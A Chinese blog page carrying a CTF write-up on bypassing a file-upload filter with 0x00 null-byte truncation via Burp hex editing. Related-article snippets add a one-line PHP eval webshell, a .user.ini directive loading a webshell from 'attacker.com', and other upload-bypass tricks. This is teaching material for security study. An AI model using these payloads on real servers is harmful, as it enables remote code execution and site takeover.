CTF实验吧-上传绕过【0x00截断】

最新推荐文章于 2025-09-24 07:57:02 发布
原创 最新推荐文章于 2025-09-24 07:57:02 发布 · 3.4w 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf #web #0x00

原题内容:

 

bypass the upload

格式:flag{}

 

解题链接: http://ctf5.shiyanbar.com/web/upload 

首先随手上传了一个图片,

得到返回:

 

再尝试php文件,得到返回

很明显,题意为卡住php后缀,逼迫你上传文件后缀为jpg等类型,典型的上传绕过问题上传绕过解题思路可参考我转载的【文件上传检测的基本思路】,一般按照思路逐步尝试即可,简单的大小写,加后缀不可过,此题无js,猜测为0x00截断上传,此处仔细分析何为0x00截断上传及其原理

简单举个例子:

 

<% 
path="upfiles/picture/" 
file="20121212.jpg" 
upfilename=path & file '最后的上传地址 
%>


upfilename即为最终名字,意思为如果地址为picture/1.php+,文件名为1.jpg则最终上传上去的文件路径为picture/1.php+1.jpg,0x00截断的思路即为将+之后的内容忽略掉使上传文件1.jpg最终上传到1.php中,此处利用到的就是0x00的截断漏洞,下面用题目做具体说明:

 

首先bp上传图片,将数据包发到repeater,并对/uploads/后面加上1.php+,此处相当于上述例子中的path:

然后打开hex(16进制),找到+对应的编码:

0x00的意思为16进制00,所以讲+对应的进制改成00(至于怎么找到对应代码,看右边对应代码,找到第几行,从左到右,每个字母对应一个代码),改完直接go

内容就是这些了,flag自行尝试吧,有疑问欢迎留言或者私信

【愚公系列】2023年04月 文件上传渗透测试之绕过白名单检查(Content-Type、%00截断0x00截断、CVE-2015-2348)
时光隧道
08-22 5万+
文件上传漏洞是一种安全漏洞,指攻击者通过网站上传功能上传恶意文件来攻击网站的漏洞。攻击者可以通过利用这种漏洞上传恶意文件来执行代码和命令,进而控制网站、窃取敏感信息等。常见的文件上传漏洞主要存在于没有健全的文件上传验证机制的网站中。白名单检查是一种安全机制,用于限制只有列入特定名单中的人员、设备或程序才可以获得访问权限,而不允许其他未经授权的访问。这种机制通常用于保护敏感数据或系统不被未经授权的访问和攻击。在白名单检查中,只有列入白名单的实体允许通过验证,而不在白名单中的所有实体都被阻止访问相关资源。
ctfhub-前端验证,.htaccess,MIME绕过,文件头检查,00截断,双写后缀
weixin_55702959的博客
02-02 1589
目录 文件上传-前端验证 文件上传-.htaccess 文件上传-MIME绕过 文件上传-文件头检查 文件上传-00截断 文件上传-双写后缀 eval执行 文件上传-前端验证 上传文件时,客户端的javascript会对文件的类型进行一个校验,只允许 “.jpg” “.png” ".gif"的文件上传,于是关掉他 about:config 一句木马 <?php @eval($_POST['123']); ?> 命名为1.php之后上传文件,用蚁剑打...
第十一节 文件上传-绕过白名单验证(00截断绕过-01
09-15
第十一节 文件上传-绕过白名单验证(00截断绕过-01
实验web--上传绕过(php 0x00截断原理)
Sea_Sand息禅
12-12 943
随便上传一个png文件,出现提示 我们再上传一个php文件,却出现提示 上传遇到问题是肯定的,题目就是上传绕过,所以我们下面要做的就是绕过检测。 这里使用00截断。 首先在提交时抓包 我们将图中upload/后面加上:123.php+ 将上面添加的php后面的加号的hex改为00 然后go一下就拿到flag了 原理剖析: 代码应该是这样的: <% p...
CTFHub 文件上传-00截断
最新发布
mooyuan的网络安全博客
09-24 1135
本文介绍了CTF文件上传00截断攻击的原理与实战应用。00截断利用低版本PHP将空字节(%00)视为字符串终止符的特性,通过构造如"shell.php%00.jpg"的文件名绕过白名单检查。实战演示了从构建包含GIF89a头的PHP木马、BurpSuite拦截修改请求、利用%00截断上传到蚁剑连接获取flag的全过程。关键点包括:1)PHP版本需低于5.3.4;2)通过%00截断文件名或路径参数;3)结合蚁剑实现远程控制。最终在/var/www/html目录下成功获取flag。
CTFHub】文件上传漏洞_00截断
Mitchell_Donovan的博客
04-20 1733
文件上传_00截断 原题链接 key:PHP的%00截断 ①原题界面如下???? 直接上传.php文件显然不行,再尝试上传图片马还是不行 ②burpsuite抓包,放到repeater中???? go一下在回应报文里找到源码???? if (!empty($_POST['submit'])) { $name = basename($_FILES['file']['name']); $info = pathinfo($name); $ext = $inf
00截断上传绕过_关于上传中的00截断分析
weixin_39922929的博客
12-20 802
关于上传00截断的细节,很多朋友在渗透中都会发现一些这样的有趣现象,这个站点使用00截断上传的方法上传成功了,而换一个站点又失败了,这是什么原因呢?你看了这篇文章就会明白。00截断原理0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。00截断的限制条件1PHP<5.3.29,且GPC关闭00截断的利用方法上传文...
CTFHUB技能树之文件上传——00截断
weixin_73049307的博客
10-23 1153
upload/后面加上0500jieduan.php%00。直接指明是00截断方法绕过
CTFHub | 00截断
尼泊罗河伯的博客
04-08 2607
分析网页源代码可以看到,这段代码检查是否有提交的文件,如果用户点击了 Submit 按钮,那么将获取到上传的文件名,将用户上传的文件名与白名单中的文件(jpg、png、gif)进行比较,并生一个相同扩展名的随机文件名称。
CTF-Web5(00截断
→_→
08-19 1554
5.上传绕过 题目名字和提示都说的很明确,这题是一道上传绕过的题目,点开题目链接,可以看到一个文件上传的界面: 这里可以尝试随便上传一些文件,看看效果: 先尝试上传一个jpg文件: 上传jpg文件的提示为必须上传后缀名为php的文件才行,那么我们再上传一个php文件: 上传的结果是告诉我们仅支持jpg,gif,png后缀的文件。 仅支持上传jpg,gif,png后缀的文件,但是上传后又会提示必须上传后缀名为php的文件才行。 那么现在这个问题该怎么去解决呢,目前有一个思.
绕过权限拿shell 00截断
10-19
绕过权限拿shell 00截断 可以在网上找到这些利用过程,本过程是实战经验,建议在主机的主机上使用。
CTF实验-WEB专题-5
qq_18661257的专栏
12-22 6148
1.上传绕过 题解 题目说是绕过,那就绕过吧,发现,上传除了php文件外会报需要传php文件,而传php文件则会报必须上传.jpg这些图片文件,那就从上传漏洞开始吧,一般常见的上传漏洞就是截断了,是0x00数据会截断后续数据,当数据为abc.php0x001.jpg时,服务器会处理为abc.php,而0x00后的数据会忽略(产生原因magic_quotes_gpc未打开,同时相关数据没有进行处理
CTFHUB-web-文件上传wp总结
Alexhirchi的博客
04-12 2377
CTFHUB文件上传总结 文件上传漏洞是指攻击者上传了一个可执行的脚本文件到服务器,并执通过此脚本文件获得执行服务端命令的能力。这里上传的文件可以是木马,病毒,恶意脚本,钓鱼图片或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 文件上传功能本身是一个正常业务需求,而问题就在于,服务器如何处理解释这个文件,当处理逻辑不够安全,...
CTFHub 文件上传 - 00截断
m0_52432374的博客
02-18 2678
CTFHub 文件上传 - 00截断 文件上传漏洞“%00截断绕过讲解": https://www.fujieace.com/penetration-test/file-upload-00.html 截断原理: 0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。 00截断的限制条件 PHP<5.3.29,且GPC关闭 http://www.admintony.com/%E5%85%B3%E4%BA%8E%E4%B8%8
文件上传 00截断
qq_69100706的博客
08-05 1825
CTF(Capture The Flag)竞赛中,00截断(Null Byte Truncation)是一种利用Web应用程序对上传文件处理不当的技巧,尤其是在处理文件名或文件内容时。00截断依赖于某些编程语言或系统在遇到ASCII null字节(\x00)时的行为,即终止字符串解析或文件处理。
CTFHUB-文件上传-00截断
weixin_68416970的博客
08-02 399
CTFHUB技能树、文件上传漏洞、00截断的过关教程
CTFHub技能书解题笔记-文件上传-00截断
qq_43006864的博客
01-12 2644
打开题目 提示我们了解一下,php 5.2 00截断,查一下相关资料吧。 截断原理: http://www.xxx.com/xx.jpg http://www.xxx.com/xx.php%00.jpg => http://www.xxx.com/xx.php 这里粗浅的说明一下本题所用到的原理,就是在.php文件后加上%00后接.jpg,这里我们就可以绕过对php文件的过滤。在执行时,%00会把后面的.jpg截断,所以执行的时候他执行的仍然是前面的.php文件。就可以实现我们的马子文件
UPLOAD LABS | PASS 12 - 白名单绕过00 截断绕过 - GET 型)
Blue17 の 小窝
12-03 1438
在 PHP < 5.3.4 版本中,存储文件时处理文件名的函数会认为 0x00 是终止符。于是在存储文件的时候,当函数读到 0x00(%00)时,就会认为文件路径已经结束。那么,为了复现漏洞,首先,就是切换我们的 PHP 版本为小于 5.3.4 版本的环境:然后,我们还需要修改对应版本的 PHP 的配置文件(
文件上传ctf黑名单绕过
07-13
CTF比赛中,绕过文件上传的黑名单限制是常见的挑战之一。攻击者通常会利用服务器端代码对文件类型验证的漏洞来实现绕过。以下是一些常见的绕过技巧: ### 1. 利用 `.htaccess` 文件解析漏洞 通过上传一个恶意的 `.htaccess` 文件,可以修改服务器的行为,使得原本被禁止的文件类型(如 `.php`)能够被当作可执行脚本处理。例如,可以在 `.htaccess` 文件中添加如下内容: ```apache AddType application/x-httpd-php .jpg ``` 这样,服务器会将 `.jpg` 文件视为 PHP 脚本进行解析和执行 [^1]。 ### 2. 使用 `0x00` 截断技术 某些情况下,服务器端代码可能对文件名进行截取或拼接时存在漏洞。攻击者可以通过在文件名中插入空字节(`%00` 或 `0x00`)来截断字符串,从而绕过文件类型检查。例如,上传一个文件名为 `t.php%00.jpg` 的文件,服务器可能会将其识别为 `t.php` 并执行其中的代码 [^2]。 ### 3. 利用中间件解析漏洞 不同的 Web 服务器(如 Apache、Nginx)或中间件可能存在特定的解析漏洞。例如,在某些配置下,Apache 可能会将带有多个扩展名的文件(如 `shell.php.jpg`)解析为 PHP 文件并执行其内容。这种行为取决于服务器的具体配置和模块设置 。 ### 4. 使用 `.user.ini` 文件 `.user.ini` 是 PHP 中的一个特殊配置文件,它允许用户自定义某些 PHP 设置。如果目标服务器支持此功能,可以通过上传一个包含 `auto_prepend_file` 或 `auto_append_file` 指令的 `.user.ini` 文件,强制服务器在每个 PHP 文件执行前或后加载一个远程或本地的 WebShell 文件。例如: ```ini auto_prepend_file=http://attacker.com/webshell.txt ``` 这会导致服务器在每次执行 PHP 文件时都会加载外部的 WebShell 文件,从而实现远程代码执行 [^3]。 ### 5. 利用文件包含漏洞 如果应用程序存在文件包含漏洞(如 `include()` 或 `require()` 函数使用不当),可以通过上传一个看似无害的文件(如图片或文本文件),然后通过文件包含漏洞将其作为脚本执行。例如,上传一个包含 PHP 代码的图片文件(如 `image.jpg`),并在请求中使用 `?page=image.jpg` 来触发文件包含漏洞 [^2]。 ### 6. 利用操作系统文件命名规则 某些操作系统(如 Windows)对文件名的处理方式与 Linux 不同。例如,Windows 允许使用长文件名,并且忽略某些特殊字符。可以通过构造特殊的文件名来绕过黑名单限制。例如,上传一个文件名为 `php.php::$DATA` 的文件,在某些环境下会被当作 `php.php` 处理 [^2]。 ### 7. 绕过路径检测 某些应用程序会对上传路径进行检测,但可能存在逻辑漏洞。例如,如果应用程序未正确处理路径中的 `../`,可以通过构造路径(如 `/up/1.php/../upload/evil.jpg`)将文件上传到任意目录。结合其他漏洞(如文件包含),可以进一步利用这些文件 [^3]。 ### 相关问题 1. 如何利用 `.htaccess` 文件实现文件上传绕过? 2. 在 CTF 比赛中,如何通过 `0x00` 截断技术绕过文件上传限制? 3. 什么是 `.user.ini` 文件的作用?如何利用它绕过文件上传黑名单? 4. 如何利用中间件解析漏洞上传恶意文件? 5. 文件包含漏洞如何与文件上传漏洞结合使用?
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值